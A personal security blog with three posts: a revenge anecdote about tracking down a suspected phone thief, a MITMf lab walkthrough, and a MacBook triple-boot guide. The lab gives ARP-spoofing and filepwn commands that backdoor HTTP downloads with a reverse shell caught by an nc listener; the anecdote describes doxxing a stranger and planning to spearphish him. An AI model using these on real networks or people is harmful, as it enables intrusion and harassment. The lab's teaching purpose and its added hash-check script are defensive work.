Saturday, February 25, 2017

Why circumstantial evidence is garbage: an almost tale of revenge

I was a dummy.

I was dropping off some Mark Zuckerturds in the pool at BSides SF and, after wiping my ass, I did not pick my phone back up.  I just left it in there, like a dumpster baby.  Well, actually, with dumpster babies there's intent to leave them there, so that comparison wasn't all that great.

I went back for my phone after 10 mins, it was gone.  I ask to use someone's phone to find mine; it's off.  It had 23% battery.  That son of a bitch shut off my phone.  I get on the mic:

"Look, I left my phone in the bathroom, it'd be really great if I got it back, it's a Nexus 6.  I know only like 10% of you could hack it, it's got full disk encryption and it's the current version of Android"
(10% was a generous number, but, given my weak passphrase choice, a determined attacker could probably bruteforce it in a week or 2. Or one of those fucks could know how to flash a new rom and bypass the activation lock since my dumbass left the bootloader unlocked)

Someone asked what my name was from the audience, and how to return it.

"Chauncey Davenport, I'm from New York, just give the phone to security"

Someone asked what my social security number was and I heard a few other infosec first date questions.  I got back on the mic:

"My first pet's name was Chauncey Davenport as well"

It made things easy when I was a kid, albeit confusing when my mom asked who shit on the floor.

I moped around the DNA lounge for the rest of the day, laundering drink tickets for redbulls to try to make myself feel better.

That night I open up craigslist with the intent of finding a new phone.  I look for a Nexus 6 and lo and behold:





That's my phone... that's my fucking phone you piece of shit.  Same location, same color, same capacity, posted 2 hours or so after BSides ended.  No contact info in the ad, screen isn't on in the picture.  This piece of living human fucking garbage hasn't even gotten past my fucking FDE, that's why the screen isn't on.  Look at the lint around the camera where the case was, he didn't even wipe the phone down before listing it, he wanted his fucking meth that badly.  WHERE'S THE CASE YOU FUCK, LET ME SEE IT, PUT IT IN YOUR AD, I KNOW IT'S MINE.  Only $200 for that phone? My phone was in great condition and you disrespect me like that?

Send him a few emails from some fake accounts that night, no reply.  Email him from my normie account (fucking terrible opsec), no reply, girlfriend emails him... we get a reply. Trying not to sound too eager we take it slow and tell him we're interested in the phone. My girlfriend manages to get his number. 

Money

So I plug his phone number into facebook, bam! I got him.  

Well, maybe this guy stole the phone he's using for craigslist.  Ummm think again, sweetie;

See that pinky ring in the reflection of the phone photo?  Oh yea, same pinky ring in his profile picture.  I got him, I fucking got him.  Found rando tax records online, found his regular email on his github.  Found friends, found family, linkedin, all his social media.  Even his home address through familytreenow.com.  fuckinPreOwned.jpg

(cept the address wasn't current, which I later found out)

I'd tried to do this the legal way, the cops told me they didn't have time for my shit.  Time for vigilante justice.  I'm Batman and my cause is just.  Imma get you, in a year or so, when you've forgotten, Imma spearphish you and ruin your life in all of the most hilarious and mean spirited ways.

The guy keeps flaking (probably can't get past my shitty password or past google's activation lock).  1 week of him canceling and all sorts of shit and it's come down.  I'm finally gonna meet him.  What do I do?  At this point I really don't care if I get my phone back, I just want proof.  Just matching IMEIs. I walk into safeway, my girlfriend watches what car he pulls up in, takes a photo of his license plate. I meet him inside.

Guy hands me the phone.  It isn't mine, the case is different.  He could have changed the case, so I'm still hopeful.  Looks like he's been using it, it's got more than just default apps. Shit, it probably isn't my phone.  Check the IMEI, it's different.  This isn't my phone.  All of the planning, all of the sleepless nights aggregating this dude's digital life for nothing.

I explain to the guy that it was supposed to be a craigslist sting, and that I was sorry for wasting his time.  He was actually a pretty cool dude.

Look, I know you can change IMEIs and fake user apps, and change a case, but this dude's opsec wasn't that strong if he was giving out his real number.  If he did take the phone, changed the IMEI, got a different case, and populated it with random apps, I can't even be mad.  That would just be impressive, I'd be proud and he could keep the fucking phone.

And that's why circumstantial evidence is garbage and why our judicial system is garbage, blah blah blah, prison industrial complex, terrorists, blah blah, innocent people suffer blah blah, human rights blah justice.  Blah blah constitution, bill of rights blah blah blah.  

"Inspirational quote"
- Chauncey Davenport

Sunday, January 25, 2015

Injecting payloads on the fly using MITMf

Check out Dan's rogue AP version of this attack, with BDFproxy using Mach-O backdoors.


MITMf by byt3bl33d3r has several modules that help in automating man-in-the-middle attacks.  This lab demonstrates the filepwn plugin being used in conjunction with the ARP spoofing plugin to intercept executables being downloaded over plain HTTP and patch our payload into them (filepwn hands the binary to secretsquirrel's Backdoor Factory, which does the actual patching).

We'll be ARP poisoning a virtual instance of Windows 7 from a Kali VM, and patching a reverse shell into an executable downloaded from an unencrypted HTTP site using Internet Explorer.  The attack depends on the download arriving over HTTP: an HTTPS download would fail to intercept (or throw a certificate error) rather than be silently modified.

On the Windows 7 machine:
Run CMD, then ipconfig
--Take note of your gateway and IP address

On the Kali Machine:
Edit your sources.list ---> nano /etc/apt/sources.list

Make sure your sources.list contains the Kali repositories:

## Regular repositories
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
## Source repositories
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

##################################

--Back in terminal
apt-get update
apt-get install mitmf
ifconfig

--Take note of your IP address

nano /usr/share/mitmf/config_files/filepwn.cfg

--Edit the host IP address to reflect your Kali Linux host.  This is the address the patched binary will connect back to, so it has to be reachable from the Windows VM.

--Take note of the port number used for the callback on your Windows x86 reverse TCP shell (the binary we're working with is 32-bit, so port 6666 is the default for that payload, and what I'm going with here).

mitmf --arp --spoof --iface eth0 --host xxx.xxx.xxx.xxx --gateway yyy.yyy.yyy.yyy --target zzz.zzz.zzz.zzz --filepwn

--Plug in those numbers you took note of earlier

--In another terminal tab:
nc -l -p 6666

--Fill in the port value as the port you took note of from the filepwn.cfg file


Windows 7 Machine:

Open up Internet Explorer
Go to live.sysinternals.com
Click an executable, preferably tcpview.exe
Save, then run it

--Check your kali host for a shell back to your netcat instance

No connection to your netcat listener? Go to your Windows host, run tcpview and look for an outbound connection to your local network.  Is the IP and port it's connecting to not your Kali instance?  Correct it in filepwn.cfg.


Some caveats:
Windows will warn you about running these modified binaries: patching the executable invalidates its Authenticode signature, and Backdoor Factory strips the certificate table rather than leave a broken one, so the download shows up as unsigned.  There are ways around this but that's outside the scope of this writeup.
Also, remember the victim AV is off in this lab; a real target's AV may flag the patched binary.
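Since the attack only works because the download arrives over plain HTTP and the victim runs whatever lands on disk, the useful check is on the receiving side.  The script below is an added example, not code from the original post or from MITMf/BDF: it parses the PE optional header to locate the Authenticode certificate table (the IMAGE_DIRECTORY_ENTRY_SECURITY slot), compares the file's SHA-256 against a hash you got over an authenticated channel, and models both the in-flight patch and the certificate-table strip against a constructed minimal PE32.  The sample PE, its "published" hash and the patched bytes are all constructed here (the body is not real shellcode); the script only detects whether a certificate table is present, it does not validate the PKCS#7 blob.

```python
"""Added example: inspect an executable downloaded over HTTP for the
effects of an in-flight patch. Checks SHA-256 against a published hash and
whether the PE still carries an Authenticode certificate table."""
import hashlib
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4       # data-directory slot of the cert table
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002  # Authenticode blobs are PKCS#7 SignedData


def _security_entry_offset(pe):
    """File offset of the IMAGE_DATA_DIRECTORY entry for the certificate table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                      # skip PE sig + COFF file header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                           # PE32
        nrva_off, dd_base = opt + 92, opt + 96
    elif magic == 0x20B:                         # PE32+
        nrva_off, dd_base = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic %#x" % magic)
    if struct.unpack_from("<I", pe, nrva_off)[0] <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return None
    return dd_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY


def security_directory(pe):
    """(file_offset, size) of the certificate table, or None if absent.
    Unlike the other directories this entry is a raw file offset, not an RVA."""
    entry = _security_entry_offset(pe)
    if entry is None:
        return None
    off, size = struct.unpack_from("<II", pe, entry)
    return (off, size) if off and size else None


def signature_info(pe):
    """Parse the WIN_CERTIFICATE header at the start of the table."""
    sd = security_directory(pe)
    if sd is None:
        return None
    length, revision, cert_type = struct.unpack_from("<IHH", pe, sd[0])
    return {"offset": sd[0], "length": length, "revision": revision,
            "type": cert_type, "pkcs7": cert_type == WIN_CERT_TYPE_PKCS_SIGNED_DATA}


def sha256_hex(pe):
    return hashlib.sha256(pe).hexdigest()


def check_download(pe, published_sha256):
    """Return (hash_matches, carries_certificate_table)."""
    return (sha256_hex(pe) == published_sha256, security_directory(pe) is not None)


def patch_bytes(pe, file_offset, payload):
    """Model the in-flight patch: overwrite bytes in the code section only."""
    pe = bytearray(pe)
    pe[file_offset:file_offset + len(payload)] = payload
    return bytes(pe)


def strip_signature(pe):
    """Model a patcher dropping the certificate table: zero the entry, truncate.
    Assumes the table sits at the end of the file, as it normally does."""
    sd = security_directory(pe)
    if sd is None:
        return pe
    pe = bytearray(pe)
    struct.pack_into("<II", pe, _security_entry_offset(pe), 0, 0)
    return bytes(pe[:sd[0]])


def build_sample_pe(with_signature=True):
    """Constructed minimal PE32 (headers + fake .text + fake cert table). Sample input only."""
    code = b"\x90" * 60 + b"\xc3" + b"\0" * 3    # 64-byte placeholder .text
    text_off = 0x200
    cert = b""
    if with_signature:
        body = b"\x30" + b"\0" * 23              # stand-in for a PKCS#7 DER blob
        cert = struct.pack("<IHH", 8 + len(body), 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + body
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)      # e_lfanew -> right after DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 92, 16)          # NumberOfRvaAndSizes
    if cert:
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                         text_off + len(code), len(cert))
    sect = bytearray(40)
    sect[:5] = b".text"
    struct.pack_into("<IIII", sect, 8, len(code), 0x1000, len(code), text_off)
    pe = bytearray(dos + b"PE\0\0" + coff + opt + sect)
    pe += b"\0" * (text_off - len(pe))
    return bytes(pe + code + cert)


if __name__ == "__main__":
    clean = build_sample_pe()
    published = sha256_hex(clean)                 # what a vendor page would list
    patched = patch_bytes(clean, 0x200, b"\xe9\x00\x00\x00\x00")  # fake jmp, not real shellcode
    for name, blob in (("clean", clean), ("patched", patched),
                       ("stripped", strip_signature(patched))):
        print(name, check_download(blob, published), signature_info(blob))
```

The hash comparison is the check that actually catches the patch: the patched copy still carries the certificate table (now invalid), so presence alone proves nothing, and the stripped copy has no table at all.  Either result on a binary that should be signed is grounds not to run it.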

Special thanks to Dan (http://lockboxx.blogspot.com/) for all the help

Thank you byt3bl33d3r, and secretsquirrel for all of your hard work developing these tools

References:
https://github.com/byt3bl33d3r/MITMf

Monday, May 12, 2014

How to triple boot a Macbook Pro with Kali Linux and Windows 7

In my quest to create a pen test lab, I discovered that I just don't have enough RAM to run everything I want to in virtual machines.  I have a late 2011 Macbook Pro running OSX Mavericks.  Why do I need physical installations of Windows 7 and Kali Linux?  Emulating Android within Kali, within OSX, was painfully slow.  There are Android tools that work best within native Windows installations, and cracking things like WPA2 handshakes on Kali works better when you're not limited by the constraints of VMware Fusion and its lackluster GPU support.

Triple booting my Macbook was painfully more annoying than any multi-boot set up on any device I have encountered.  This is because it became a source of ongoing psychosis in the face of utter failure.  I couldn't let my computer beat me, so this is how I won:

*This guide probably won't help you with your Macbook Air
*This method is only going to work if you have 1 partition to begin with
*I'm not responsible if you lose your data, you should have backed it up
*I'm assuming you've installed operating systems before and you're familiar with the setup for Windows and Kali Linux, and some command line stuff

--First off, you're going to need 2 DVDs, one for Kali Linux, and one for Windows 7.
(DVDs, not flash drives.  I tried the flash drives, it was a nightmare)

--You're also going to need 1 flash drive > 2gb

--Download and install refit

--Download and install fdisk for mac

--Put the Windows 7 disk in your computer, insert your flash drive, start boot camp assistant

--Click continue, check the boxes next to 'Download the latest Windows Support Software from Apple' and 'Install or remove Windows 7 or later'.  Then click continue.  (You'll want that support software when it comes time to install drivers in Windows, because your wireless won't work right after installation)

--Select your flash drive as the destination for your Windows driver pack.

--Wait as it downloads and does its thing.

--When the partition screen comes up, go ahead and resize it if you like.

--Let it do its thing till it reboots into your Windows setup disc

--Click next, install, custom installation, etc.  When you reach the hard drive/ partition page, click the bootcamp partition.  Click advanced options.  Delete it, click new, click next.  Grab a snack while Windows installs.

--Once Windows is done and you're on your Windows 7 desktop, eject your installation DVD, restart your computer (install your drivers when you're done with this guide, it can wait).  Wait for the chime and hold down your 'alt' key.  Select OSX, if refit comes up, select OSX again.

--When OSX has booted, open up Disk Utility, and select your hard drive.  Click the partitions tab and click the + sign, adjust the size to fit your Kali installation.  Label it Kali or anything you like.  Set the partition type as fat or exfat.  Apply liberally.

--Put your Kali disc in your computer and restart it.

--Refit should come up, select the Linux disc when it does.  If it doesn't show up, select restart; sometimes the drive doesn't spin up fast enough.

--Install Kali Linux, when it asks you for the missing firmware just skip it.  You can install that later too

--Go through the installation like you normally would, when you get to the partitioning setup, click manual.

--Select the partition labeled Kali, or whatever you chose to call it.  Look at the number next to it, which partition number is it?  Remember it, we'll call it partition X for the purpose of this guide.  Select this partition, set the mount point to /, format as ext4, and set it as bootable.

--Save the changes and continue with the setup, ignore the swap partition message, deal with it later.

--Grab another snack, possibly a scone.  Wait till the installer finishes.  It'll ask you where you want to install grub, type in /dev/sdaX (X is our place holder for that number I had you remember)

Congratulations!  Both of your installations are now broken!

--Restart your computer into OSX

--Eject your Kali Linux install disk

--Open terminal and type
sudo gdisk /dev/disk0
r   (recovery and transformation menu)
p   (print the partition table)
It'll list your partitions
h   (make a hybrid MBR)
--It'll ask you to put in the partitions that you want to be able to boot from, for me it was 2 3 4
--It'll ask you if you want to put the EFI partition first, you should do that.
--It'll ask you for the MBR codes, refer to the list of your partitions and enter the first 2 digits of each hexadecimal type code (defaults should work)

--Don't set any flags as bootable

--Once finished hit w if you messed up hit q and try it again.

--Restart your computer, in the refit menu select the linux installation

--It should give you the option to boot all the things.

--Finish your driver installs and do your thing